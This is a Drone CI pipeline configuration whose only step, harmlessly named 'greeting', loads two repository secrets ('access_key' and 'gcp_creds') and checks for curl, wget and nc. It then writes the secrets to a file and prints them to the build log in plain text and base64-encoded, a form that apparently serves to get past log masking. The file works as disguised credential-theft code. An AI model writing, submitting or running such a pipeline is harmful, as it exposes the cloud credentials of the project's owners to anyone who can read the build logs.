kind: pipeline
type: docker
name: default

steps:
- name: greeting
  image: alpine
  environment:
    KEY:
      from_secret: access_key
    TOKEN:
      from_secret: gcp_creds
      
  commands:
  - echo WHICH_CURL $(which curl)
  - echo WHICH_WGET $(which wget)
  - echo WHICH_NC $(which nc)
  - echo Initializing...
  - echo "$${KEY} $${TOKEN}" > a
  - echo CAT $(cat a)
  - echo CAT64 $(cat a|base64 -w0)
